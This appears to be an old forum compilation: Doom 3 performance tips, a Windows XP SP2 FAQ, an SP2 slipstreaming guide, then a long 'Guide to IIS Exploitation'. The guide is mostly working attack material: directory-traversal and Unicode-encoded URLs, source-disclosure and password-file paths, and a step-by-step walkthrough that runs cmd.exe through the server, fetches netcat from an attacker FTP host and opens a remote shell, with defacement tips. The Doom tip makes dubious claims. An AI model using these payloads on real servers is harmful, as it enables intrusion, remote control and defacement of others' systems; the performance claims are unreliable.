Improve Doom 3's Performances
!!, simple but efficient trick for every1

"The Catalyst 4.9 beta drivers are a sneak peak into future drivers that ATI is continuously working on. They were released mainly for the OpenGL component update, targeting improved Doom3 performance. Having said that, newer generations of hardware will get the most benefit from this driver (X800* series). While I haven't done specific benchmarks, X800 users can see performance increase of 5~30%, depending on the level and the system/hardware type. Regretfully, older hardware, such as 9700's and even 9800's will not get as much benefit. And if paired with a slower system (or with less memory) might see +/- performance improvements."[/size]

Source: www.Teamradeon.com

There is a boost, but don't expect miracles. With that said, give this a read:

As all of you who already have this game recognized the game is very slow even on new Computers.

I found out the reason for this and the solution to fix this problem.

As you already know after installation the game consits only of the doom3.exe and some .PK4 files. Those PK4 files includes the entire game (sounds, videos, textures etc.) in high compressed form.

Normally those files were decompresse during the game.

But this exactly is the problem. Even new CPUs are not able to decompress those files while running the game with good peformance and therfore the game runs very **** also on new computers. I don't know if the develpers of
ID-Soft was just too stupid to think about this or if they have an agreement with some hardware manufacturing firms.

How to get around this problem:

It is very simple. Go to your Doom 3 installation directoy and get inside the folder "Base". There are some .PK4 files you have to open each of them with WinRAR 3.3 and extract their entire contents to the Base dir in you Doom 3 installation folder (replace all files if they are any duplicates). Now you have to delete all .PK4 files in the Base folder to prevent the game to use those compressed files again.

Now the game starts and runs much faster!!!

Have fun playing Doom 3!!!

It supposedly gives a small performance boost and improves some load times.

This is a guarenteed way to get a MASSIVE performance increase to your game, at the expense of taking up a little ore hard drive space (2 gigs approx). I went from running low quality at 800x600 to running High Quality on 1024x768. This improves load times AND framerate/details.

There is a catch! By doing this, you temporarily can't connect to pure multiplayer servers. You have been warned (I'll tell you how to revert it at the end)

After installation, the Doom III Folder consists only of the doom3.exe and some .PK4 files. Those PK4 files includes the entire game (sounds, videos, textures etc.) compressed. They are normally uncompressed in mid game, which is very hard on your CPU. Lets fix this!

1. Make a copy of ALL the files in C:\Program Files\Doom 3\base. This is some big filage, but if you want to revert to MP without reinstalling you need to do it.

2. Unrar the following .pk4 files (just pretend they are .rar's and open them with winrar) into the C:\Program Files\Doom 3\base folder (each one should unrar a single folder such as textures or models):

pak000.pk4
pak001.pk4
pak002.pk4
pak003.pk4
pak004.pk4 (This one has many files, put them all in \Base and over right any that apply.

3. Now delete the files above (pak000-004) or move them to another folder for storage so you can revert to multiplayer.

When you want to revert to multiplayer, restore everything you had before and get rid of the new stuff. I'm not sure if the folder "maps" is the same or not, so make sure you back that up.

When in normal mode, you should have "maps" "savegames" "config.spec" "doomConfig.cfg" "doomkey" "game00.pk4" and "gamex86.dll", nothing else. ALSO! If you open DoomConfig.cfg (C:\programfiles\doom3\base) in notepad and change

seta image_cacheMegs "32"

to a higher number, such as 96 or 128 you will see a big increase too. Go for it bad boys!"


keep informed if one of you manages to test sometime today.

Other stuff I found:

http://www.ocfaq.com/softmod/bios.php

BIOS to flash your ATI's cards

http://www.anandtech.com/cpuchipsets/showdoc.aspx?i=2149&p=3

explanation on how to run the DOOM 3 benchmark demo

Important Faqs For Sp2

Refer to this site for SP2 FAQs.

Questions like:

Should I slipstream SP1 into Windows XP before SP2? Nope!


View them here:

hXXXp://www.ntu.edu.sg/CITS/getting+help/faqs/windows+xp+sp2.htm#q4

Windows XP SP2 (Service Pack 2) Frequently Asked Questions

What is the size of this Windows XP SP2?
What is the minimum requirement for the system to run Windows XP SP2?
Can I upgrade my system with Windows XP SP2?
Do I have to install an earlier Service Pack 1 before installing Windows XP SP2?
Is there any patch that is required to install prior to SP2 installation?
Where can I download (and install) a copy of Windows XP SP2?
Is there any application that has compatibility issues with Windows XP SP2?
What are the patches found in this Windows XP SP2?
What is new in Windows XP SP2?
How do I install Windows XP SP2?
What is this so called Windows Firewall?
How do I know that the Windows Firewall is enabled in my system?
Can I disable the Windows Firewall?
With Windows Firewall turn on, do I still need to have an anti-virus software installed on my computer?
My computer stops responding when I restart to complete the installation of Windows XP Service Pack 2. What should I do?
I receive a "Stop: c0000135" and "winsrv was not found" error message after I install Windows XP Service Pack 2?
After installing SP2 and reboot my system, I receive this message "Your network administrator can unblock this program for you". Why is this so and what should I do?
When I am surfing to some websites using Internet Explorer, I notice that Internet Explorer does not display some of the pop-up windows? Why is this so and what should I do to display these pop-up windows?


What is the size of this Windows XP SP2?
The size of Windows XP SP2 (Service Pack 2) is about 270MB (back to top)


What is the minimum requirement for the system to run Windows XP SP2?
You need a PC running Microsoft Windows XP with at least 233-MHz processor, 64 MB of RAM and 1.6GB of available hard-disk space during installation. (back to top)


Can I upgrade my system with Windows XP SP2?
If you are using any application/software provided by your School, do a quick check with your School IT Support whether that application/software can run on Win XP SP2. Thereafter, proceed to the next question below.

Note: Before installing Windows XP SP2, it is strongly recommended to back up or make a copy of your data files. (back to top)

Do I have to install an earlier Service Pack 1 before installing Windows XP SP2?
No. (back to top)

Is there any patch that is required to install prior to SP2 installation?
Microsoft has issue a critical patch (KB885523) that will resolve compatibility issue with a non-Microsoft software application installed on your computer. Download and install this patch prior the installation of SP2. This download can be found
CODE
http://www.microsoft.com/downloads/details.aspx?amp;displaylang=en.&familyid=65875203-CF1B-4D32-8F32-E00D004659F6&displaylang=en


** NO ACTIVE LINKS - Ninja **

Microsoft has issue a non-security critical update (KB885626) that will help to resolve an issue where a limited number of systems running a BIOS without production support for Intel Pentium 4 and Intel Celeron D processors based on Prescott C-0 stepping that can potentially hang on Windows XP Service Pack 2 installation.
This download can be found at
CODE
http://support.microsoft.com/default.aspx?scid=kb
;[LN];885626 (back to top)
** NO ACTIVE LINKS - Ninja **

Where can I download (and install) a copy of Windows XP SP2?
You can download a copy of Windows XP SP2 from one of the following methods:
a. Microsoft Download Site
b. Windows Update
c. Automatic Update
d. CD Order Process from Microsoft
e. CITS Software Directory (back to top)

Is there any application that has compatibility issues with Windows XP SP2?
Microsoft has list out a list of programs that are known to have experience a loss of
functionality when running on Windows XP SP2. Click here for more details.

There is also a list of programs that may stop working after installing Win XP SP2.
Click here for the details. (back to top)

What are the patches found in this Windows XP SP2?
Please refer to the following Microsoft sites for the updates:
a. Security patches
b. Fixes (back to top)

What is new in Windows XP SP2?
This SP2 has improved security technologies that will withstand malicious viruses and worms attacks. These technologies include:
a. Network protection (protection against malicious attacks)
b. Memory protection (prevent buffer overruns)
c. E-mail handling (improved attachment control using AES API)
d. Browsing security (lock down Local Machine zone and turn on pop-up blocker)
e. Computer maintenance (keep computer with the latest security updated)

For greater details, please refer to Microsoft site here (back to top)

How do I install Win XP SP2?
After you have downloaded the Win XP SP2, the Setup Wizard will appear.
a. Note: Remember to protect or back up all data files
b. In the 'Welcome to Windows XP Service Pack 2 Setup Wizard', click Next.
c. In the 'License Agreement', select 'I Agree' and click Next.
d. In the next screen for 'Uninstalled Folders', click Next to proceed.
e. The system will proceed to do the inspection of your current configuration, archive your current files and update your files. This will take quite a while, so please wait patiently.
f. At the end of the installation, click Finish and this will reboot your system.
g. After rebooting, a firewall option screen may appear. Select the 'ON' radio button to proceed with the turning on the Windows Firewall.
h. Ensure that the security essentials are all turn ON (by clicking Start -> Control Panel -> Security Center) (back to top)

What is this so called Windows Firewall?
Windows Firewall (previously known as Internet Connection Firewall or ICF in Win XP) is a software-based, stateful filtering firewall for Microsoft Windows XP.

After the Win XP SP2 installation, this Windows Firewall is turned on by default.

Windows Firewall provides protection for computers that are connected to a network by preventing unsolicited inbound connections through TCP/IP. The Configuration options include:
a. Enabling static exceptions for ports
b. Enabling exceptions for applications
c. Configuring basic ICMP options
d. Logging dropped packets and successful connections (back to top)

How do I know that the Windows Firewall is enabled in my system?
Go to the Control Panel and click Security Center and check that the Firewall is ON

Alternatively, if you open up the LAN connection icon, you will notice a lock symbol being shown.

Can I disable the Windows Firewall?
You can manually turn it off, if you have the administrator rights. However, it is advisable to leave it on in order to minimize any virus, worms or trogons attacks.

With Windows Firewall turn on, do I still need to have an anti-virus software installed on my computer?
Even with Windows Firewall turn on, it is still necessary to have an anti-virus software installed in the computer. Windows Firewall is NOT a replacement for anti-virus software but acts as a compliment to anti-virus software. (back to top)

My computer stops responding when I restart to complete the installation of Windows XP Service Pack 2. What should I do?
This issue may occur if either (1) your computer uses an Intel Pentium 4 or Intel Celeron D processor that is based on Prescott C-0 processor stepping or (2) Your computer has a BIOS version that is out of specification.

Contact your computer manufacturer for an updated version of BIOS that provides production support for the processor that is installed in your computer or refer to Microsoft article
CODE
http://support.microsoft.com/default.aspx?scid=kb
;[LN];885626 for resolution.
(back to top)
** NO ACTIVE LINKS - Ninja **

I receive a "Stop: c0000135" and "winsrv was not found" error message after I install Windows XP Service Pack 2?
This problem may occur if either you have (1) T.V. Media (TvMedia.tvmbho) from Total Velocity Corporation is installed on your computer or (2) not installed Critical Update 885523 or (3) tried to install Windows XP SP2.

Refer to Microsoft article
CODE
http://support.microsoft.com/?kbid=885523
for resolution
(back to top)
** NO ACTIVE LINKS - Ninja **

After installing SP2 and reboot my system, I receive this message "Your network administrator can unblock this program for you". Why is this so and what should I do?
This is because you are not the administrator of this system. You should use an administrator account to log in to unblock this program.
After logging in as an administrator, you can either choose to 'Keep Blocking' this program or 'Unblock' this program or 'Ask Me Later' when I run that program again as shown below.

When I am surfing to some websites using Internet Explorer, I notice that Internet Explorer does not display some of the pop-up windows? Why is this so and what should I do to display these pop-up windows?
When you install SP2, the pop-up blocker is turned on in Internet Explorer. It will block most automcatic pop-ups but it will play a sound and show the Information Bar when a pop-up is blocked as shown below.

To temporarily or always allow pop-ups from that website, click the Information Bar when it notifies a pop-up has been blocked. Choose the correct setting as shown below.

If you choose to 'Always Allow Pop-ups from This Site', it will prompt you to confirm again to permanently trust this website to allow pop-ups. Click 'Yes' if you are sure.

Guide to Slipstreaming Service Pack 2
DarkLegacy's Guide to Slipstreaming Service Pack 2

Note: All images are hosted with ImageShack.

• This guide will allow you to sucsessfully install Service Pack 2 on the original (gold) code of Microsoft Windows XP.
• The version of Windows you have purchased/downloaded does not matter as far as slipstreaming (they're all the same anyway).

Things you need:
• Microsoft Windows XP (duh :P)
• Service Pack 2:

URL http://download.microsoft.com/download/1/6/5/165b076b-aaa9-443d-84f0-73cf11fdcdf8/WindowsXP-KB835935-SP2-ENU.exe

• Windows XP Boot sector:

http://www.neowin.net/downloads/xpboot.bin

• Nero Burning Rom (find it on SoD)

Step One

Insert the Microsoft Windows XP CD into your CD-ROM drive, and create a new folder on your hard-drive labelled "CD".

Copy all of the files from the Windows XP CD to the "CD" folder.




Step Two

Download Service Pack 2 and place it within the root of your hard-drive.
Ex: C:\ D:\ etc..



Step Three

Go to Start -> Run and type in "F:\WindowsXP-KB835935-SP2-ENU.exe -s:F:\CD" (depending on where you put the folder)

The actual command is -s:drive:\folder



Step Four

The Service Pack 2 updater will automatically slipstream Service Pack 2 into your "CD" folder.




Step Five

If you browse back to the CD folder, you'll notice that new folders and files appeared from the SP2 update. At this point, you can include any software you wish onto this CD, but make sure that the size of the folder does not exceed the media you are burning on. If you're not sure, a regular CD is 700 megabytes.



Step Six

Go to Start and Search for files and folders. Go to all files and folders, and type in "wpa.dbl". This is the activation file for your current installed version of XP. Make a copy of the file and paste it into your CD folder.



Step Seven

Open up Nero Smartstart, and click on the icon that looks like two people. This turns the program into "professional mode". Search for create a bootable CD. Click on it, and make sure that your settings agree with the following picture; also make sure that you downloaded the Windows XP boot sector.



Step Eight

Continue onto the next tab, and make sure that your settings agree with the picture:



Step Nine

In this step, you can label your CD whatever the hell you want. I recommend WXPSP2_EN.


Step Ten

Go to "new" and locate your CD folder. Drag all of the files in the CD folder to the compilation window on the right, and nero will calculate how much disk space was used. If it exceeds 700 MB, get rid of some programs that you added to the CD. If you didn't add anything; just push burn.


Step Eleven

Make sure that your settings check with the picture:



Step Twelve

Just push burn, and that's it! Congradulations, you just made a bootable Win XP CD with SP2 slipstreamed!

Guide to IIS Exploitation

***************************************************************************
* Guide to IIS Exploitation *
* by fugjostle *
* *
* V.1.0.1 *
* *
* Questions? Comments? Email: fugjostle at ch0wn.com *
***************************************************************************

Disclaimer: I do not condone hacking IIS servers in any way, shape or form. This guide is intended as a guide for admins to help them understand what most script kiddies don't understand but are happy to exploit.


--[On the first day, God created directory traversal]

Relative paths are the developers friend. They allow an entire website to be moved to another directory without the need for changing all the links in the html. For example, lets say we have a webpage called 'pictures.html' in the htdocs dir:

Absolute path: /home/webpages/htdocs/pictures.html
Absolute path: /home/webpages/images/pic1.gif

In the html you can refer to the 'pic1.gif' via an absolute path shown above or use a relative path:

Relative path: ../images/pic1.gif

The relative path tells the server that it has to go to the parent directory (dot dot) --> from /home/webpages/htdocs to /home/webpages. Then the server goes into the images dir and looks for the gif file to display.

Anyone who has used the 'cd' command in DOS and *nix should be familiar with the operation. So what's the problem I hear you ask... well, the programmers of web server didn't think to check the supplied URL to ensure that the requested file was actually in the web directory. This allows someone to backtrack through the servers directory structure and request files that the web server has access to. For example,

http://www.target.com/../../../etc/passwd

NB. you can also use double dots and double quotes. This is useful to evade
Intrusion Detection Systems (IDS):

http://www.target.com//....//....//...././etc/./passwd

The webserver simply strips the extra stuff out and processes the request.
This is the same as the previous example and can make string matching IDS's
work for their money.


--[On the second day, God created Hexadecimal]

Once programmers started to realise the mistake they began to create parser
routines to check for naughty URL's and keep the requests within the
document root. Then along comes a wiley hacker who wonders if by encoding
the URL will it still be recognised by the parser routines.

You may have noticed that when you enter a URL that includes a space it is
replaced with the hex equivalent (%20):

http://www.target.com/stuff/my index.html

becomes

http://www.target.com/stuff/my%20index.html

and voila, it works. So what would happen if we changed the now denied URL:

http://www.target.com/../../../etc/passwd

to

http://www.target.com/%2e%2e/%2e%2e/%2e%2e/etc/passwd

The parser routine checks for the existence of dots in the path and finds
none... the webserver then proceeds with the request.

An interesting feature is that you can encode the hex symbol and the web
server will decode it all for you. This is called the "double decode".
For example, given the URL "http://victim.com/..%252f..%252fdocs/", the
following will take place:

(1) On the first decode, the string will be converted to:

"http://victim.com/..%2f..%2fdocs/"

[%25 = '%' so '%252f' is decoded to '%2f']

(2) On the second decode, the string will be converted to:

"http://victim.com/../../docs/"

[%2f = '/']


--[On the third day, God created Unicode]

The World Wide Web is a global phenomenon and as such needs to be globally
interoperable. This raised the question of how to deal with all the different
character sets around the world. As a response to this, Unicode was created:

-----------------------------------------------------------------

Unicode provides a unique number for every character, no matter what the platform, no matter what the program, no matter what the language. The Unicode Standard has been adopted by such industry leaders as Apple, HP, IBM, JustSystem, Microsoft, Oracle,SAP, Sun, Sybase, Unisys and many others. Unicode is required by modern standards such as XML, Java, ECMAScript (JavaScript), LDAP, CORBA 3.0, WML, etc., and is the official way to implement ISO/IEC 10646. It is supported in many operating systems, all modern browsers, and many other products.

-----from http://www.unicode.org---------------------------------


The problem with Unicode is that it requires 16 bits for a single character
and software tended to use 8 bits for a single character. Unicode TransForm
using 8 bits (UTF-8) was created. This allows for multibyte encoding where a
variable number of bytes can be used for each character:

Character 1-byte 2-byte 3-byte
. 2E C0 AE E0 80 AE
/ 2F C0 AF E0 80 AF
\ 5C C1 9C E0 81 9C

This lead to a new vulnerability in certain webservers. The parser didn't
understand this new encoding and allowed it through :-)

For example:

www.target.com/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/etc/passwd

Recent vulnerabilities have been taking advantage of the fact that the web
server doesn't understand the Unicode UTF-8 character set but the underlying
OS does:

www.target.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c%20dir

Understanding the distinction between Unicode and UTF-8 can be difficult. As
a general rule of thumb you can use the following format as a guide:

%uxxxx = Unicode
%xx%xx = UTF-8
%xx = Hexidecimal
%xxxx = Double Decode

--[On the fourth day, God created default installs]

IIS comes installed with various DLL's (Dynamic Link Libraries) that
increase the functionality of the web server. These ISAPI (Internet Server
API) applications allow programmers/developers to deliver more functionality
to IIS.

The DLL's are loaded into memory at startup and offer significant speed
over traditional CGI programs. For example, they can be combined with the
Internet Database Connector (httpodbc.dll) to create interactive sites that
use ODBC to access databases.

The problem is that some of these DLL's are insecure and are often installed
with sample scripts that demonstrate how to exploit, erm, I mean use them.

ASP.DLL is used to pre-process requests that end in ".asp". ASP (Active
Server Pages) are basically HTML pages with embedded code that is processed
by the webserver before serving it to the client.

Here's some examples to illustrate how the sample pages installed by default
can aid someone breaking into your site via the ASP.DLL:
[prefix all the examples with http://www.target.com]

/default.asp.

** Appending a '.' to the URL can reveal the source
** on older systems. Remember hex encoding? You can
** also try using %2e to do the same thing.

/msadc/samples/adctest.asp

** This gives you an interface into the msadcs.dll
** and allows creation of DSN's. Read RFP's stuff
** for idea's on how to exploit this.

/iissamples/exair/howitworks/codebrws.asp?source=/msadc/Samples/../../.../../../../boot.ini
/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/../../../../.../boot.ini

** You can view the source of anything in the
** document root. '/msadc/' needs to be in the
** request as it is checked for, wait for this,
** security :-)

/index.asp::$DATA

** Appending '::$DATA' to the URL can reveal
** the source of the ASP.

/index.asp%81

** Append a hex value between 0x81 and 0xfe
** and you can reveal the source of any server
** processed file. This only works on servers
** that are Chinese, Japanese or Korean.

/AdvWorks/equipment/catalog_type.asp?ProductType=|shell("cmd+/c+dir+c:\")|

** This one allows you to execute remote
** shell commands ;-)

ISM.DLL is used to process requests that end in ".htr". These pages were used
to administer IIS3 servers. In IIS4 they are not used but various .htr samples
are installed by default anyway and offer another avenue for entry.

/index.asp%20%20%20..(220 more)..%20%20.htr

** IIS will redirect this request to ISM.DLL,
** which will strip the '.htr' extension and
** deliver the source code of the file.

/global.asa+.htr

** Does the same thing as the %20%20 exploit
** above. ISM.DLL strips the +.htr and delivers
** you the source of the file

/scripts/iisadmin/ism.dll?http/dir

** Excellent brute force opportunity if the
** dll exists. Successful logons will reveal
** lots of useful stuff.

/iisadmpwd/aexp.htr

** The iisadmpwd diectory contains several .htr
** files that allow NetBIOS resolution and
** password attacks.

/scripts/iisadmin/bdir.htr??c:\inetpub\www

** This method will only reveal directories
** but can be useful for identifying the
** servers structure for more advanced
** attacks later.

MSADCS.DLL is used to allow access to ODBC components via IIS using RDS
(Remote Data Service). RDS is part of the default install of Microsoft Data
Access Components (MDAC) and is a commonly exploited on IIS. It can allow
arbitrary shell commands to be executed with system privileges.

/msadc/msadcs.dll

** If this file exists then there's a pretty
** good chance that you can run the RDS
** exploit again the box. More on this later.

HTTPODBC.DLL is the Internet Connector Database (IDC) and used when the web
server wants to connect to a database. It allows the creation of web pages
from data in the database, and it allows you to update/delete items from
within webpages. Pages with the extension '.idc' are sent to the HTTPODBC.DLL
for processing.

/index.idc::$DATA

** Appending '::$DATA' to the URL can reveal
** the source of the IDC.

/anything.idc

** Requesting a non-existance file will
** reveal the location of the web root.

/scripts/iisadmin/tools/ctss.idc

** Creates a table based on the parameters it
** receives. Excellent place to look at for
** SQL injection.

SSINC.DLL is used for processing Server Side Includes (SSI). '.stm',
'.shtm' and '.shtml' extension are sent to the DLL which interprets
the SSI statements within the HTML before sending it to the client.

An example of SSI would be:



This SSI tells the server to include the 'news.txt' in the final HTML
sent to the use. SSI statements are beyond the scope of this document
but offer another security hole open to our wiley hax0r. Ensure you
remove the app mapping and disable SSI if you do not require its
functionality.

SSINC.DLL is also vulnerable to a remote buffer overflow, read the
following advisory for details:

http://www.nsfocus.com/english/homepage/sa01-06.htm

Some examples of SSINC.DLL fun:

/anything.stm

** If you request a file that doesn't exist
** then the server error message contains the
** the location of the web root.

/somedir/anything.stm/somedir/index.asp

** Using this method allows you to view the
** the source code for index.asp.

IDQ.DLL is a component of MS Index Server and handles '.ida' and '.idq'
requests. This DLL has had some big exposure with the recent Nimda worm.
I'm not going into too much detail but '.ida' was used in a buffer
overflow that resulted in user defined code being executed on the server.

/anything.ida or /anything.idq

** Requesting a non-existance file will
** reveal the location of the web root.

/query.idq?CiTemplate=../../../boot.ini

** You can use this to read any file on
** the same drive as the web root

CPSHOST.DLL is the Microsoft Posting Acceptor. This allows uploads to your
IIS server, via a web browser or the Web Publishing Wizard. The existance of
this DLL can allow attackers upload files to the server. Other files such as
uploadn.asp, uploadx.asp, upload.asp and repost.asp are installed with Site
Server and allow upload of documents to the server:

/scripts/cpshost.dll?PUBLISH?/scripts/dodgy.asp

** If this file is there then you may be able
** to upload files to the server.

/scripts/uploadn.asp

** Connecting to this page gives you a nice
** gui for uploading your own webpages. You
** probably need to brute the userid.

There are lots more example scripts in the default install and quite a few
of them are very, very insecure. Microsoft recommends that you remove ALL
samples from any production server including the ExAir, WSH, ADO and other
installed samples.

IIS Default Web Site
--------------------
IISSAMPLES - c:\inetpub\iissamples
IISADMIN - c:\winnt\system32\inetsrv\issadmin
IISHELP - c:\winnt\help
SCRIPTS - c:\inetpub\scripts
IISADMPWD - c:\winnt\systems32\inetsrv\iisadmpwd
msadc - c:\program files\common files\system\msadc
logfiles - c:\winnt\system32\logfiles
default.htm - c:\inetpub\wwwroot

IIS Default App Mapping
-----------------------
.asa - c:\winnt\system32\inetsrv\asp.dll
.asp - c:\winnt\system32\inetsrv\asp.dll
.cdx - c:\winnt\system32\inetsrv\asp.dll
.cer - c:\winnt\system32\inetsrv\asp.dll
.htr - c:\winnt\system32\inetsrv\ism.dll
.idc - c:\winnt\system32\inetsrv\httpodbc.dll
.shtm - c:\winnt\system32\inetsrv\ssinc.dll
.shtml - c:\winnt\system32\inetsrv\ssinc.dll
.stm - c:\winnt\system32\inetsrv\ssinc.dll


--[On the fifth day, God created Frontpage Extensions]

Microsoft Frontpage (Originally developed by Vermeer Tech Inc, if you've
ever wondered why they use _vti_) is a web design tool that helps you
create and maintain a web site and allows you to publish it to the web
server.

In order to publish using Frontpage the server needs to run certain
programs, collectively called the Frontpage Server Extensions.

Sounds good I hear you say, but there are many, many security holes in
Frontpage. You can list all the files, download password files and upload
your own files on Frontpage enabled sites.

When you publish a file, Frontpage attempts to read the following URL to
get all the information it needs to publish:

http://www.myserver.com/_vti_inf.html

Then Frontpage uses the following URL to POST the files to the site:

http://www.myserver.com/_vti_bin/shtml.exe/_vti_rpc

It will come as no surprise that this file is not protected and open to
abuse.

All information for the site is stored in the /_vti_pvt/ dir, and its world
readable. Here's some of the things you can look for:

http://www.myserver.com/_vti_pvt/administrators.pwd
http://www.myserver.com/_vti_pvt/authors.pwd
http://www.myserver.com/_vti_pvt/service.pwd
http://www.myserver.com/_vti_pvt/shtml.dll
http://www.myserver.com/_vti_pvt/shtml.exe
http://www.myserver.com/_vti_pvt/users.pwd
http://www.myserver.com/_private


--[On the sixth day, God created CGI]--

The Common Gateway Interface (CGI) is a standard for interfacing external
applications to the web server. A CGI program is excuted in real time and
is used to create dynamic web sites.

Generally, the CGI programs are kept in '/cgi-bin/' but can be placed
anywhere. The programs can be written most languages but typically they are
written in C, Perl or shell scripts.

Many sites will use freely available, downloadable scripts from places like
Matt's Trojan, erm, I mean Matt's Script Archive. Its always a good idea to
look through the source of the scripts for bad system calls and lax input
validation.

CGI deserves a tutorial all to itself and I strongly suggest that you read
the following tutorials... they explain it better than I ever could:

Hacking CGI - http://shells.cyberarmy.com/~johnr/docs/cgi/cgi.txt
Perl CGI Problems - http://www.phrack.com/phrack/55/P55-07

Just to get you in the mood we will have a brief look at CGI exploitation.
There are three main types of CGI hacking; URL encoding attacks, input
validation exploits and buffer overflows.

The first thing to keep in mind is that you are already able to exploit cgi
using the techniques from previous sections. First, we need to cover some
background. CGI can take lots of shapes and forms. One popular use is via
web based forms that submit information to a CGI via a GET or POST.

When the user clicks on the submit button his information is passed to the
CGI script to process either via the URL (GET) or via HTTP headers (POST).
Lets assume that the CGI we are going to exploit asks the user for the name
of a file to display. The 'GET' method uses the URL to pass the information
and it would look like this:

http://www.target.com/cgi-bin/my_cgi.cgi?filename=/etc/passwd

Lets break that down:

? - separates the request from the parameters
filename - this is the name of the textbox in the html
= - assignment for the parameter/value pair
/etc/passwd - this is what the user typed into the box

You can have multiple fields within a HTML form and these will also be
passed to the CGI. They are separated using a '&':

http://www.target.com/cgi-bin/my_cgi.cgi?filename=/etc/passwd&user=fugjostle

If you were thinking how could you alter the user supplied input to break
the CGI then good, you're starting to think in terms of security. Lots of
developers love to program new and interesting things but they do not
consider security. A security conscious programmer would write input
validation routines that would process the data and ensure the user wasn't
be malicious or curious.

As you read through some of the free scripts on the web you will start to
realise that many programmers do not think about security. Lets look briefly
at some ways we could exploit the CGI. The first thing to keep in mind is
that you already know the generic exploits from the previous section. The
only area in which we are lacking is programming language specific info.

We will stick with the example cgi that open's a file (and let's assume
its written Perl). Lets look at some of the things we can try:

my_cgi.pl?filename=../../../../../etc/passwd

and lets do the same thing but encode the URL to bypass security checks:

my_cgi.pl?filename=../..%c0%af../..%c0%af../etc/passwd

If you have read the RFP document above then you will be familiar with
poison null bytes. Stop now and go read it... can't be arsed? ok then,
here's the quick version. %00 is valid in a string with Perl but is NUL
in C. So? When Perl wants to open the file it makes a request to the
operating system through a system call. The operating system is written in
C and %00 is a string delimiter. Lets apply this technique to the
following situation.

I decide to secure my CGI. I append '.html' to any request. This means that
the user can only view html files and if they try something else then it
doesn't exist. wh00p @ me :-)

But... what if I was to do the following:

my_cgi.pl?filename=../../../../etc/passwd%00

In Perl the filename string would look like this:

"../../../../etc/passwd\0.html"

Perfectly valid under Perl. I have done my job... or have I? When this is
passed to the OS (which is written in C not Perl) the request looks like
this:

"../../../../etc/passwd"

The OS identifies %00 as the string delimiter and ignores anything that
Comes after it. The webserver then displays the /etc/passwd file... bugger :-(

Many people download scripts from the web and look for problems in the
script. Then the wiley hax0r will go to altavista and search for sites
that are using that script, eg:

url:pollit.cgi

and good old altavista provides a list of sites that are just ripe for the
taking.

The final method of exploiting CGI is via buffer overflows. Languages like
Java and Perl are immune to buffer overflows because the language looks
after memory management. Programs written in a language such as C are
vulnerable because the programmer is supposed to manage the memory. Some
programmers fail to check the size of data it is fitting into the memory
buffer and overwrites data in the stack.

The goal of the buffer overflow is to overwrite the instruction pointer
which points to the location of the next bit of code to run. An attacker
will attempt to overwrite this pointer with a new pointer that points to
attacker's code, usually a root shell.

Quite a few CGI's exist that are vulnerable to this type of attack. For
Example, counter.exe is one such CGI. By writing 2000 A's to the CGI cause
a Denial of Service (DoS).

The details of buffer overflows are beyond the scope of this document.
Look out for a future release ;-)

If you want to dig deeper in buffer overflows then have a look at:

http://www.phrack.com/phrack/49/P49-14


--[On the seventh day, God chilled and haxored the planet]

Well.. I guess its time we actually tried some of the things discussed but
I'm not going to cover everything. I suggest going to the following URL's
and searching for IIS:

http://www.securityfocus.com/
http://www.packetstormsecurity.com/

My main reason for doing this file was to better understand Unicode exploits
and so that is going to be the focus of the exploitation. The first exploit
I'm going to go through is the recent Unicode exploit for IIS4/5:

http://www.securityfocus.com/bid/1806

Before I get emails saying 'hold on, you said that %xx%xx is UTF-8" let me
explain. This had wide exposure on Bugtraq as the Unicode exploit. In
reality, this is not a Unicode sploit but a UTF-8 sploit. I'm going to keep
calling this the Unicode exploit because its now referenced by this name in
the Bugtraq archives and you'll have to search using Unicode to do further
research.

Ok, rant over... To check if the server is exploitable, request the
following URL:

http://target.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

You should get a directory listing of the C:\ drive on the target server.
The important thing to note is that the Unicode string can vary depending
where in the world you are. Some possible alternatives include:

%c1%1c %c0%9v %c0%af %c0%qf %c1%8s %c1%9c %c1%pc

There are many more to choose from, just look at some of the Bugtraq posts or
research UTF-8 for more alternatives.

OK, you can read the directory... what next? You have the directory listing
and the ability to run commands, so you need to find the web root. By default,
the web root is at:

c:\inetpub\wwwroot\

If its not there then go and look for it. Let's write a text file there and
see if we can see it:

cmd.exe?/c+echo+owned+>+c:\inetpub\wwwroot\test.txt

hmmm.. it seems that we don't have write access. Ok, no problem we can get
around that by creating a copy of the cmd.exe that has write privileges:

cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\winnt\system32\fug.exe

Let's check if it worked:

http://target.com/scripts/..%c0%af../winnt/system32/fug.exe?/c+dir+c:\

Yep.. all's good so far. Lets try and write to the web root:

fug.exe?/c+echo+owned+>+c:\inetpub\wwwroot\test.txt

Let's open up it up in the browser and see if we can see it:

http://target.com/test.txt

w00t!!! Write access!!! Right, we now have some options open to us. In the
words of Microsoft, where do you want to go today? Working via the URL is
pretty clunky and I like the comfort of a nice command prompt, So lets do
that. I want to bring over a copy of netcat and a nice html page that I'll
use to replace the existing one.

First I need to think about the script I want to run that will get the
files I need from my FTP server:

fugscript:
open ftp.evilhaxor.com
anonymous
anon@microsoft.com
cd pub
get nc.exe
get hacked.html
quit

Right. I need to get this script onto the webserver:

fug.exe?/c+echo%20open%20ftp.evilhaxor.com>fugscript
fug.exe?/c+echo%20anonymous>>fugscript
fug.exe?/c+echo%20anon@microsoft.com>>fugscript
fug.exe?/c+echo%20cd%20pub>>fugscript
fug.exe?/c+echo%20get%20nc.exe>>fugscript
fug.exe?/c+echo%20get%20hacked.html>>fugscript
fug.exe?/c+echo%20quit>>fugscript

OK.. now we have created a script on the server called fugscript. Next step
is to execute the script and get my files from my web server.

fug.exe?/c+ftp%20-s:fugscript

If all goes well the server should begin the FTP transfer and get your files
transferred. Be patient and give it time to transfer. Now you are ready to
get netcat listening on a port. The command line for starting netcat is:

nc.exe -l -p 6667 -e cmd.exe

This tells netcat to listen (-l) on port 6667 (-p) and to spawn cmd.exe (-e)
when someone connects. The last step is to translate this command into URL
speak ;-):

fug.exe?/c+nc.exe%20-l%20-p%206667%20-e%20cmd.exe

Fire up a telnet session and connect to port 6667 on the target system and
voila... you have a cmd prompt. I really hate web defacements... so if your
going to do it then rename the existing index.htm (or default.htm) to
something like index.htm.old (give the poor admin a break, cause you can bet
your arse that he hasn't made a backup). ALSO: you are now using a system
without authorisation and as such, you are guilty under the Computer Misuse
